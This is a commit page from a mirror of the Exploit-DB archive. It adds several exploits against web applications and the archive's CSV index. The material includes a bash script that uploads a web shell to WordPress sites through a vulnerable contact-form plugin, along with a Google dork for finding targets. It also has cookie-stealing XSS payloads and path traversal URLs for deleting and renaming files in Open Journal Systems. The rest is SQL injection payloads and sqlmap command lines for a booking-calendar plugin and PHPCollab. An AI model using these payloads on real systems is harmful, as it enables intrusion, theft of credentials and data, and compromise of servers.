bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2015-05-14

Browse source 
9 new exploits
This commit is contained in:
Offensive Security 2015-05-14 05:02:52 +00:00
parent d35a443cc5
commit c9501aad62
12 changed files with 718 additions and 35 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

13
files.csv
View file

@ -948,7 +948,7 @@ id,file,description,date,author,platform,type,port
1145,platforms/php/webapps/1145.pm,"Wordpress <= 1.5.1.3 - Remote Code Execution eXploit (metasploit)",2005-08-10,str0ke,php,webapps,0
1146,platforms/windows/remote/1146.c,"Microsoft Windows Plug-and-Play Service Remote Overflow (MS05-039)",2005-08-11,sl0ppy,windows,remote,139
1147,platforms/windows/remote/1147.pm,"Veritas Backup Exec Remote File Access Exploit (windows)",2005-08-11,N/A,windows,remote,10000
1149,platforms/windows/remote/1149.c,"Microsoft Windows Plug-and-Play Service Remote Universal Exploit (MS05-039)",2005-08-12,houseofdabus,windows,remote,445
1149,platforms/windows/remote/1149.c,"Microsoft Windows Plug-and-Play Service - Remote Universal Exploit (MS05-039)",2005-08-12,houseofdabus,windows,remote,445
1150,platforms/windows/remote/1150.pm,"ZENworks 6.5 Desktop/Server Management Remote Stack Overflow",2005-08-12,N/A,windows,remote,1761
1151,platforms/windows/remote/1151.pm,"MDaemon 8.0.3 IMAPD CRAM-MD5 Authentication Overflow Exploit",2005-08-12,N/A,windows,remote,143
1152,platforms/windows/remote/1152.pm,"Novell eDirectory 8.7.3 iMonitor Remote Stack Overflow",2005-08-12,N/A,windows,remote,8008
@ -33245,7 +33245,7 @@ id,file,description,date,author,platform,type,port
36837,platforms/windows/local/36837.rb,"iTunes 10.6.1.7 - '.PLS' Title Buffer Overflow",2015-04-27,"Fady Mohammed Osman",windows,local,0
36844,platforms/php/webapps/36844.txt,"WordPress <= 4.2 - Stored XSS",2015-04-27,klikki,php,webapps,0
36839,platforms/multiple/remote/36839.py,"MiniUPnPd 1.0 - Stack Overflow RCE for AirTies RT Series (MIPS)",2015-04-27,"Onur Alanbel (BGA)",multiple,remote,0
36840,platforms/multiple/local/36840.py,"Wireshark <=1.12.4 - Memory Corruption and Access Violation PoC",2015-04-27,"Avinash Thapa",multiple,local,0
36840,platforms/multiple/dos/36840.py,"Wireshark <=1.12.4 - Memory Corruption and Access Violation PoC",2015-04-27,"Avinash Thapa",multiple,dos,0
36841,platforms/windows/local/36841.py,"UniPDF Version 1.2 - 'xml' Buffer Overflow Crash PoC",2015-04-27,"Avinash Thapa",windows,local,0
36842,platforms/php/webapps/36842.pl,"OTRS < 3.1.x & < 3.2.x & < 3.3.x - Stored Cross-Site Scripting (XSS)",2015-04-27,"Adam Ziaja",php,webapps,0
36994,platforms/cgi/webapps/36994.txt,"WebGlimpse 2.18.7 'DOC' Parameter Directory Traversal Vulnerability",2009-04-17,MustLive,cgi,webapps,0
@ -33367,6 +33367,7 @@ id,file,description,date,author,platform,type,port
36976,platforms/cgi/webapps/36976.txt,"WebGlimpse 2.x 'wgarcmin.cgi' Path Disclosure Vulnerability",2012-03-18,Websecurity,cgi,webapps,0
36977,platforms/php/webapps/36977.pl,"CreateVision CreateVision CMS 'id' Parameter SQL Injection Vulnerability",2012-03-11,"Zwierzchowski Oskar",php,webapps,0
36978,platforms/hardware/webapps/36978.txt,"ZTE F660 - Remote Config Download",2015-05-11,"Daniel Cisa",hardware,webapps,0
36979,platforms/php/webapps/36979.sh,"Wordpress N-Media Website Contact Form with File Upload 1.3.4 - File Upload",2015-05-11,"Claudio Viviani & F17.c0de",php,webapps,0
36980,platforms/windows/local/36980.py,"VideoCharge Express 3.16.3.04 - BOF Exploit",2015-05-11,evil_comrade,windows,local,0
36981,platforms/windows/local/36981.py,"VideoCharge Professional + Express Vanilla 3.18.4.04 - BOF Exploit",2015-05-11,evil_comrade,windows,local,0
36982,platforms/windows/local/36982.py,"VideoCharge Vanilla 3.16.4.06 - BOF Exploit",2015-05-11,evil_comrade,windows,local,0
@ -33380,3 +33381,11 @@ id,file,description,date,author,platform,type,port
36992,platforms/php/webapps/36992.txt,"Wing FTP Server Admin <= 4.4.5 - CSRF Add Arbitrary User",2015-05-11,"John Page",php,webapps,0
36993,platforms/php/webapps/36993.txt,"SQLBuddy 1.3.3 - Path Traversal Vulnerability",2015-05-11,"John Page",php,webapps,0
36996,platforms/unix/remote/36996.rb,"SixApart MovableType Storable Perl Code Execution",2015-05-12,metasploit,unix,remote,80
36997,platforms/php/webapps/36997.txt,"CMSimple 3.3 'index.php' Cross Site Scripting Vulnerability",2012-03-21,"Stefan Schurtz",php,webapps,0
36998,platforms/php/webapps/36998.txt,"Open Journal Systems (OJS) 2.3.6 /lib/pkp/lib/tinymce/jscripts/tiny_mce/plugins/ibrowser/ibrowser.php Multiple Parameter XSS",2012-03-21,"High-Tech Bridge",php,webapps,0
36999,platforms/php/webapps/36999.txt,"Open Journal Systems (OJS) 2.3.6 index.php authors[][url] Parameter XSS",2012-03-21,"High-Tech Bridge",php,webapps,0
37000,platforms/php/webapps/37000.txt,"Open Journal Systems (OJS) 2.3.6 /lib/pkp/classes/core/String.inc.php String::stripUnsafeHtml() Method XSS",2012-03-21,"High-Tech Bridge",php,webapps,0
37001,platforms/php/webapps/37001.txt,"Open Journal Systems (OJS) 2.3.6 Multiple Script Arbitrary File Upload",2012-03-21,"High-Tech Bridge",php,webapps,0
37002,platforms/php/webapps/37002.txt,"Open Journal Systems (OJS) 2.3.6 /lib/pkp/lib/tinymce/jscripts/tiny_mce/plugins/ibrowser/scripts/rfiles.php param Parameter Multiple Function Traversal Arbitrary File Manipulation",2012-03-21,"High-Tech Bridge",php,webapps,0
37003,platforms/php/webapps/37003.txt,"WordPress Booking Calendar Contact Form 1.0.2 - Multiple vulnerabilities",2015-05-13,"i0akiN SEC-LABORATORY",php,webapps,0
37004,platforms/php/webapps/37004.txt,"PHPCollab 2.5 - SQL Injection",2015-05-13,"Wad Deek",php,webapps,0

Can't render this file because it is too large.

30
platforms/multiple/local/36840.py
View file

@ -1,30 +0,0 @@
#!/usr/bin/python
# EXPLOIT TITLE: WIRESHARK <=1.12.4 Access Violation and Memory Corruption PoC
# AUTHOR: Avinash Kumar Thapa "-Acid"
# Date of Testing: 26th April'2015
# Vendor Homepage: http://www.wireshark.org
# Tested On : Windows 8.1 Pro
# Steps to Reproduce the Crash
# Step 1: Create a File Using PoC
# Step 2: Go to wirehshark and in filter field, put ip.addr=={Buffer}
# Step 3: Click "Apply"
# Some other places for the Crash are:
# Statistics > IP Statistics then any of the field you can use.
# Statistics > Packet Length > Paste the buffer in the field
# Statistics > ANCP
# Statistics > Collectd
# Statistics > Compared
# Statistis >
buffer = "A"*80000
file = open("wireshark.txt","w")
file.write(buffer)
file.close()
print "POC Created by -Acid"
print " Email: acid.exploit@gmail.com"

50
platforms/php/webapps/36979.sh Executable file
View file

@ -0,0 +1,50 @@
#!/bin/bash
#
# Exploit Title : Wordpress N-Media Website Contact Form with File Upload 1.3.4
# Google Dork : inurl:"/uploads/contact_files/"
# Exploit Author : Claudio Viviani
# Vulnerability discovered by : Claudio Viviani
# Script Written by : F17.c0de
# Software link : https://downloads.wordpress.org/plugin/website-contact-form-with-file-upload.1.3.4.zip
# Version : 1.3.4
# Tested on : Kali Linux 1.1.0a / Curl 7.26.0
# Info: The "upload_file()" ajax function is affected from unrestircted file upload vulnerability
# Response : {"status":"uploaded","filename":"YOURSHELL"}
# Shell location http://VICTIM/wp-content/uploads/contact_files/YOURSHELL
echo '
+---------------------------------------------------------------+
| |
| Wordpress N-Media Website Contact Form with File Upload 1.3.4 |
| |
+---------------------------------------------------------------+
| |
| Script by : F17.c0de |
| Vuln Discovered by : Claudio Viviani |
| Date : 15.04.2015 |
| Google Dork : inurl:"/uploads/contact_files/" |
| Vulnerability : "upload_file()" on admin-ajax.php |
| Description : Auto shell uploader |
| |
+---------------------------------------------------------------+
| No System is Safe |
+---------------------------------------------------------------+
'
echo -n -e "Path of your shell: "
read bd
echo -n -e "Victim address [ex: http://www.victim.com]: "
read st
sleep 1
echo
echo "Uploading Shell. . ."
echo
curl -k -X POST -F "action=upload" -F "Filedata=@./$bd" -F "action=nm_webcontact_upload_file" $st/wp-admin/admin-ajax.php
echo
echo
echo "Job Finished"
echo

9
platforms/php/webapps/36997.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/52661/info
CMSimple is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
CMSimple 3.3 is vulnerable; other versions may also be affected.
http://www.example.com//cmsimple/cmsimplexh152/?'"</script><script>alert(document.cookie)</script>

15
platforms/php/webapps/36998.txt Executable file
View file

@ -0,0 +1,15 @@
source: http://www.securityfocus.com/bid/52666/info
Open Journal Systems is prone to following multiple vulnerabilities because the software fails to sufficiently sanitize user-supplied input:
1. An arbitrary-file-deletion vulnerability
2. A security vulnerability
3. An arbitrary-file-upload vulnerability
4. Multiple cross-site scripting vulnerabilities
An attacker may leverage these issues to execute arbitrary script code, upload arbitrary files, and execute arbitrary code with administrative privileges. These issues may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Open Journal Systems 2.3.6 is vulnerable; other versions may also be affected.
http://www.example.com/lib/pkp/lib/tinymce/jscripts/tiny_mce/plugins/ibrowser/ibrowser.php?editor=z&callb ack=x;};};alert%2834%29;{{&lang=en
http://www.example.com/lib/pkp/lib/tinymce/jscripts/tiny_mce/plugin s/ibrowser/ibrowser.php?editor=%27%29;};};alert%2834%29;{{a=x%28%27&callback=iBrowser_callback&a mp;lang=en

19
platforms/php/webapps/36999.txt Executable file
View file

@ -0,0 +1,19 @@
source: http://www.securityfocus.com/bid/52666/info
Open Journal Systems is prone to following multiple vulnerabilities because the software fails to sufficiently sanitize user-supplied input:
1. An arbitrary-file-deletion vulnerability
2. A security vulnerability
3. An arbitrary-file-upload vulnerability
4. Multiple cross-site scripting vulnerabilities
An attacker may leverage these issues to execute arbitrary script code, upload arbitrary files, and execute arbitrary code with administrative privileges. These issues may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Open Journal Systems 2.3.6 is vulnerable; other versions may also be affected.
On the submissions page URL:
http://www.example.com/index.php/[journal]/author/submit/3?articleId=[id]
the attacker should add a malicious code to the "URL" field:
"><script>alert(document.cookie)</script>
the XSS will be displayed here:
http://www.example.com/index.php/[submission]/author/submission/[id]

21
platforms/php/webapps/37000.txt Executable file
View file

@ -0,0 +1,21 @@
source: http://www.securityfocus.com/bid/52666/info
Open Journal Systems is prone to following multiple vulnerabilities because the software fails to sufficiently sanitize user-supplied input:
1. An arbitrary-file-deletion vulnerability
2. A security vulnerability
3. An arbitrary-file-upload vulnerability
4. Multiple cross-site scripting vulnerabilities
An attacker may leverage these issues to execute arbitrary script code, upload arbitrary files, and execute arbitrary code with administrative privileges. These issues may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Open Journal Systems 2.3.6 is vulnerable; other versions may also be affected.
On the following URL:
http://www.example.com/index.php/[journal]/author/submit/3?articleId=[id]
the attacker should inject malicious scripting code to the "Bio Statement" or "Abstract of Submission" fields:
<img src="x"/onerror=alert(document.cookie)>
or (browser specific):
<img style="width:expression(alert(document.cookie));"></a>
The stored XSS will be displayed here:
http://www.example.com/index.php/[submission]/author/submission/[id]

20
platforms/php/webapps/37001.txt Executable file
View file

@ -0,0 +1,20 @@
source: http://www.securityfocus.com/bid/52666/info
Open Journal Systems is prone to following multiple vulnerabilities because the software fails to sufficiently sanitize user-supplied input:
1. An arbitrary-file-deletion vulnerability
2. A security vulnerability
3. An arbitrary-file-upload vulnerability
4. Multiple cross-site scripting vulnerabilities
An attacker may leverage these issues to execute arbitrary script code, upload arbitrary files, and execute arbitrary code with administrative privileges. These issues may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Open Journal Systems 2.3.6 is vulnerable; other versions may also be affected.
Malicious registered user shall start a new Submission:
http://www.example.com/index.php/[journal]/author/submit/1
on the second step of the Submission:
http://www.example.com/index.php/[journal]/author/submit/2?articleId=14
the user should upload test.pHp, test.asp, test.cgi, test.php3 or test.html file. The uploaded file will be available on the following URL:
http://www.example.com/files/journals/[journalid]/articles/[articleid]/submission/original/[newfilename]
The original file name will be changed, however it will be displayed to the user after upload (for example "16-28-1-SM.pHp"). File extension will remain the same.

18
platforms/php/webapps/37002.txt Executable file
View file

@ -0,0 +1,18 @@
source: http://www.securityfocus.com/bid/52666/info
Open Journal Systems is prone to following multiple vulnerabilities because the software fails to sufficiently sanitize user-supplied input:
1. An arbitrary-file-deletion vulnerability
2. A security vulnerability
3. An arbitrary-file-upload vulnerability
4. Multiple cross-site scripting vulnerabilities
An attacker may leverage these issues to execute arbitrary script code, upload arbitrary files, and execute arbitrary code with administrative privileges. These issues may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Open Journal Systems 2.3.6 is vulnerable; other versions may also be affected.
http://www.example.com/lib/pkp/lib/tinymce/jscripts/tiny_mce/plugins/ibrowser/scripts/rfiles.php?lang=en& param=delete|/../../../../../../../../../../../../../../../../../../../temp/file_to_delete
Arbitrary File Renaming:
http://www.example.com/lib/pkp/lib/tinymce/jscripts/tiny_mce/plugins/ibrowser/scripts/rfiles.php?lang=en& param=rename|file.jpg|file.php%00.jpg
http://www.example.com/lib/pkp/lib/tinymce/jscripts/tiny_mce/plugins/ibrowser/scripts/rfiles.php?lang=en& param=rename|/../../../../../../../../../../../../../../../../../../../tmp/file_to_move|1x.jpg

526
platforms/php/webapps/37003.txt Executable file
View file

@ -0,0 +1,526 @@
# Exploit Title: WordPress Booking Calendar Contact Form 1.0.2[Multiple
vulnerabilities]
# Date: 2015-05-01
# Google Dork: Index of
/wordpress/wp-content/plugins/booking-calendar-contact-form/
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
# Software Link:
http://wordpress.dwbooster.com/calendars/booking-calendar-contact-form
# Vendor: CodePeople.net
# Vebdor URI: http://codepeople.net
# Version: 1.0.2
# OWASP Top10: A1-Injection
# Tested on: windows 7 ultimate + firefox + sqlmap 0.9.
============================================
* Authenticated SQL injection
============================================
========================
Description
========================
In a site that has installed the plugin vulnerable and an attacker who has
an account
editor privileges can exploit the flaw SQL injection and possibly escalate
their privileges.
========================
Vulnerability
========================
vulnerable function code is located in dex_bcf.php
function dex_bccf_load_season_prices() {
global $wpdb;
if ( ! current_user_can('edit_pages') )
{
echo 'No enough privilegies to load this content.';
exit;
}
if (!defined('CP_BCCF_CALENDAR_ID'))
define ('CP_BCCF_CALENDAR_ID',$_GET["dex_item"]);
//.....vulnerable line
$codes = $wpdb->get_results( 'SELECT * FROM
'.$wpdb->prefix.DEX_BCCF_SEASON_PRICES_TABLE_NAME_NO_PREFIX.' WHERE
`cal_id`='.CP_BCCF_CALENDAR_ID);
$maxcosts = 0;
...
if (count ($codes))
{
... //Print results [bueno para seleccion mediante UNION]
foreach ($codes as $value)
{
echo '<tr>';
$price = explode(';',$value->price);
echo '<td>'.$price[0].'</td>';
for ($k=1; $k<=$maxcosts; $k++)
echo '<td>'.@$price[$k].'</td>';
echo '<td>'.substr($value->date_from,0,10).'</td>';
echo '<td>'.substr($value->date_to,0,10).'</td>';
echo '<td>[<a
href="javascript:dex_delete_season_price('.$value->id.')">Delete</a>]</td>';
echo '</tr>';
}
...
}
======================
Injection
======================
the following urls can be used to inject code.
----------------------------------------------------------
http://wp-host/wp-path/wp-admin/?action=dex_bccf_check_posted_data&dex_bccf=loadseasonprices&dex_item=1
------------------------
GET parameter vulnerable
------------------------
dex_item
========================
injection techniques:
========================
-> UNION BASED
-> TIME BASED BLIND
=======================
POC
=======================
Obtaining all available databases from mysql server with sqlmap.
---------------------------------------------------------------
python sqlmap.py --url="
http://wp-host/wp-path/wp-admin/?action=dex_bccf_check_posted_data&dex_bccf=loadseasonprices&dex_item=1
"
-p dex_item --level=5 --risk=3 --cookie="PUT_YOUR_WP_EDITOR_COOKIE_HERE"
--dbms="mysql" --dbs
====================================================
=====================================================
* Filter bypass & Authenticated SQL injection
=====================================================
===============
Vulnerable code
================
function dex_bccf_calendar_delete($ret) {
global $wpdb;
$wpdb->query( "delete from ".TDE_BCCFCALENDAR_DATA_TABLE." where
id=".esc_sql($_POST["id"]) );
return $ret;
}
======================
Injection
======================
Following URLs are affected.
----------------------------------------------------------
http://wp-host/wp-path/wp-admin/admin-ajax.php?action=dex_bccf_calendar_ajaxevent&dex_bccf_calendar_load2=delete
------------------------
POST parameter vulnerable
------------------------
id
========================
injection techniques:
========================
-> TIME BASED BLIND
=======================
POC
=======================
Obtaining all available databases from mysql server with sqlmap.
---------------------------------------------------------------
python sqlmap.py --url="
http://localhost/wordpress/wp-admin/admin-ajax.php?action=dex_bccf_calendar_ajaxevent&dex_bccf_calendar_load2=delete
"
--data="id=1" -p id --level=5 --risk=3
--cookie="PUT_YOUR_WP_EDITOR_COOKIE_HERE" --dbms="mysql" --dbs --technique T
====================================================
* Authenticated SQL injection
====================================================
===============
Vulnerable code
================
function dex_bccf_calendar_update($ret) {
global $wpdb;
dex_bccf_add_field_verify(TDE_BCCFCALENDAR_DATA_TABLE, "viadmin",
"varchar(10) DEFAULT '0' NOT NULL");
dex_bccf_add_field_verify(TDE_BCCFCALENDAR_DATA_TABLE, "color",
"varchar(10)");
$wpdb->query("update ".TDE_BCCFCALENDAR_DATA_TABLE." set
title='".esc_sql($_POST["title"])."',description='".esc_sql($_POST["description"])."',color='".esc_sql($_POST["color"])."'
where id=".esc_sql($_POST["id"]) );
return $ret;
}
======================
Injection
======================
Following URLs are affected.
----------------------------------------------------------
http://wp-host/wp-path/wp-admin/admin-ajax.php?action=dex_bccf_calendar_ajaxevent&dex_bccf_calendar_load2=edit
------------------------
POST parameter vulnerable
------------------------
id
========================
injection techniques:
========================
-> BLIND
=======================
POC
=======================
(modifing all rows with "i0akiN" value and sleeping 5 seconds)
url
-------
http://wp-host/wp-path/wp-admin/admin-ajax.php?action=dex_bccf_calendar_ajaxevent&dex_bccf_calendar_load2=edit
----------
post data
----------
id=0 or 1=1 AND SLEEP(5) -- -
&tile=i0akiN&description=i0akiN&color=i0akiN
=====================================================
* Filter bypass & Authenticated SQL injection
=====================================================
===============
Vulnerable code
================
function dex_bccf_calendar_add($ret) {
global $wpdb;
$calid = str_replace (TDE_BCCFCAL_PREFIX, "",@$_GET["id"]);
...
$wpdb->query("insert into
".TDE_BCCFCALENDAR_DATA_TABLE."(viadmin,reservation_calendar_id,datatime_s,datatime_e,title,description,color)
".
"
values(1,".esc_sql($calid).",'".esc_sql($_POST["startdate"])."','".esc_sql($_POST["enddate"])."','".esc_sql($_POST["title"])."','"
.esc_sql($_POST["description"])."','".esc_sql($_POST["color"])."')");
..
}
======================
Injection
======================
Following URLs are affected.
----------------------------------------------------------
http://wp-host/wp-path/wp-admin/admin-ajax.php?action=dex_bccf_calendar_ajaxevent&dex_bccf_calendar_load2=add&id=[SQLi]
========================
injection techniques:
========================
-> Insertion data
=======================
POC
=======================
Insert a row into wp_bccf_reservation_calendars_data table without use
other post parameters
http://wp-host/wp-path/wp-admin/admin-ajax.php?action=dex_bccf_calendar_ajaxevent&dex_bccf_calendar_load2=add&
id=12,0x617373,0x617373,0x617373,0x617373,0x617373); -- -
====================================================
* Unauthenticated SQL injection
====================================================
=======================
Description
=======================
An attacker without autorization can send modified requests to database and
sensitive information
that can use for escalate privilegies and more...
======================
Vulnerability
======================
vulnerable function code is located in dex_bcf.php
function dex_bccf_caculate_price($startday, $enddate, $calendar,
$default_price) {
...
//$calendar is not sanitized in sql query
$codes = $wpdb->get_results( 'SELECT * FROM
'.$wpdb->prefix.DEX_BCCF_SEASON_PRICES_TABLE_NAME_NO_PREFIX.' WHERE
`cal_id`='.$calendar);
$mode =
(dex_bccf_get_option('calendar_mode',DEX_BCCF_DEFAULT_CALENDAR_MODE) ==
'false');
while (
(($enddate>$startday) && !$mode) ||
(($enddate>=$startday) && $mode)
)
{
$daily_price = $default_price;
$sprice = array();
foreach ($codes as $value)
{
$sfrom = strtotime($value->date_from);
$sto = strtotime($value->date_to);
if ($startday >= $sfrom && $startday <= $sto)
{
$sprice = explode (';', $value->price);
$daily_price = $sprice[0];
}
}
$season_prices[] = $sprice;
$price += $daily_price;
$startday = strtotime (date("Y-m-d", $startday)." +1 day");
//60*60*24;
$days++;
}
...
}
======================
Injection
======================
Following URLs are affected.
----------------------------------------------------------
http://wp-host/wp-path/?action=dex_bccf_check_posted_data&dex_bccf=getcost
------------------------
post variable vulnerable
------------------------
dex_item=1
========================
injection techniques:
========================
-> UNION BASED <- yeaahh!!
-> TIME BASED BLIND
-> BOOLEAN BASED BLIND
========================
POC
========================
Obtaining all available databases from mysql server with sqlmap.
python sqlmap.py --url="
http://localhost/wordpress/?action=dex_bccf_check_posted_data&dex_bccf=getcost
"
--data="dex_item=1" -p dex_item --level=5 --risk=3 --dbms="mysql" --dbs
--tecnique U
===========================================================
============================================================
* Unauthenticated SQL injection 2
============================================================
========================
Description
========================
The following function is also vulnerable to SQL injection because usually
the variable
CP_BCCF_CALENDAR_ID it equals the content of POST ['dex_item'] or GET
['dex_item'] Besides this function is used in several places
the code.
========================
Vulnerability
========================
Vulnerable function:
function dex_bccf_get_option ($field, $default_value)
{
global $wpdb, $dex_option_buffered_item, $dex_option_buffered_id;
if (!defined("CP_BCCF_CALENDAR_ID"))
return $default_value;
if ($dex_option_buffered_id == CP_BCCF_CALENDAR_ID)
$value = @$dex_option_buffered_item->$field;
else
{
//....vulnerable line
$myrows = $wpdb->get_results( "SELECT * FROM
".DEX_BCCF_CONFIG_TABLE_NAME." WHERE id=".CP_BCCF_CALENDAR_ID );
$value = @$myrows[0]->$field;
$dex_option_buffered_item = $myrows[0];
$dex_option_buffered_id = CP_BCCF_CALENDAR_ID;
}
if ($value == '' && $dex_option_buffered_item->calendar_language == '')
$value = $default_value;
return $value;
}
##########################################
======================================
* CAPTCHA BYPASS & ROW INSERTION
======================================
==============
DESCRIPTION
==============
An attacker can manipulate some variables for bypass conditional staments.
For example: insert unlimited rows into
table (could use a program)
=============
... HOW?
=============
An attacker encodes parameter GET['hdcaptcha_dex_bccf_post'] to MD5
encryption saving into value of
"rand_code" cookie.
==========
POC
==========
REQUEST
-----------
http://localhost/wordpress/wp-admin/admin-ajax.php?action=dex_bccf_check_posted_data&hdcaptcha_dex_bccf_post=1&
dex_item=1&
http://localhost/wordpress/wp-admin/admin-ajax.php?action=dex_bccf_check_posted_data&
hdcaptcha_dex_bccf_post=1&dex_item=1&hdcaptcha_dex_bccf_post=joaquin
^
-------------- |
POST VARIABLES
--------------
hdcaptcha_dex_bccf_post=1
-------
COOKIES
-------
rand_code=a6beca7f198112079f836a4e67cf4821 <---joaquin MD5 encrypted
===========================
VULNERABLE FUNCTION CODE
==========================
function dex_bccf_check_posted_data(){
....
if (!isset($_GET['hdcaptcha_dex_bccf_post'])
||$_GET['hdcaptcha_dex_bccf_post'] == '') $_GET['hdcaptcha_dex_bccf_post']
= @$_POST['hdcaptcha_dex_bccf_post'];
if (
(dex_bccf_get_option('dexcv_enable_captcha',
TDE_BCCFDEFAULT_dexcv_enable_captcha) != 'false') &&
( (strtolower($_GET['hdcaptcha_dex_bccf_post']) !=
strtolower($_SESSION['rand_code'])) ||
($_SESSION['rand_code'] == '')
)
&&
( (md5(strtolower($_GET['hdcaptcha_dex_bccf_post'])) !=
($_COOKIE['rand_code'])) ||
($_COOKIE['rand_code'] == '')
)
)
{
$_SESSION['rand_code'] = '';
echo 'captchafailed';
exit;
}
// if this isn't the real post (it was the captcha verification) then echo
ok and exit
if ( 'POST' != $_SERVER['REQUEST_METHOD'] || ! isset(
$_POST['dex_bccf_post'] ) )
{
echo 'ok';
exit;
}
...
}
###########################################
=======================================
* Persistent JS/HTML code injection
=======================================
========================
Description:
========================
Un atacante sin autenticacion puede inyectar codigo malicioso que podria
ejecutar el navegador
de la victima(could be an administrator). Cuando la victima visite la
pagina modificada, el atacante
podria robar datos y/o controlar las acciones de la victima de forma remota.
========================
Vulnerability
========================
http://localhost/wordpress/wp-admin/admin-ajax.php?action=dex_bccf_check_posted_data
POST-DATA
dex_item=2
dex_bccf_post_options=1
email_confirmation_to_user=%3C%2Ftextarea%3E CUSTOM JS/HTML INYECTION
%3Ctextarea%3E
email_notification_to_admin=%3C%2Ftextarea%3E CUSTOM JS/HTML INYECTION
%3Ctextarea%3E
Parameters email_confirmation_to_user,email_notification_to_admin not
filtered and is included in admin page
====================
VULNERABLE FUNCTION
====================
dex_bccf_save_options() located in dex_bccf.php
save unfiltered post data
#########################################

26
platforms/php/webapps/37004.txt Executable file
View file

@ -0,0 +1,26 @@
# Exploit Title: PHPCollab 2.5 - SQL Injection
# Google Dork: filetype:php inurl:"/general/login.php?PHPSESSID="
# Date: 13/05/2015
# Exploit Author: Wad Deek
# Vendor Homepage: http://www.phpcollab.com/
# Software Link: http://sourceforge.net/projects/phpcollab/files/final/2.5/
# Version: 2.5
+>2.5<+ --> /docs/changes.txt
+>2.5<+ --> /docs/readme.txt
# Tested on: Xampp on Windows7
###################################################################################
PoC = http://127.0.0.1/phpcollab/topics/deletetopics.php?project=%27
###################################################################################
#=====================================================
require('mechanize')
agent = Mechanize.new()
agent.redirect_ok = false
agent.verify_mode = OpenSSL::SSL::VERIFY_NONE
#=====================================================
begin
html = agent.get("http://127.0.0.1/phpcollab/topics/deletetopics.php?project=%27")
rescue
else
puts(html.body())
end
#=====================================================

6
platforms/windows/remote/1149.c
View file

@ -431,6 +431,6 @@ main (int argc, char **argv)
recv(sockfd, recvbuf, 4096, 0);
return 0;
}
// milw0rm.com [2005-08-12]
}
// milw0rm.com [2005-08-12]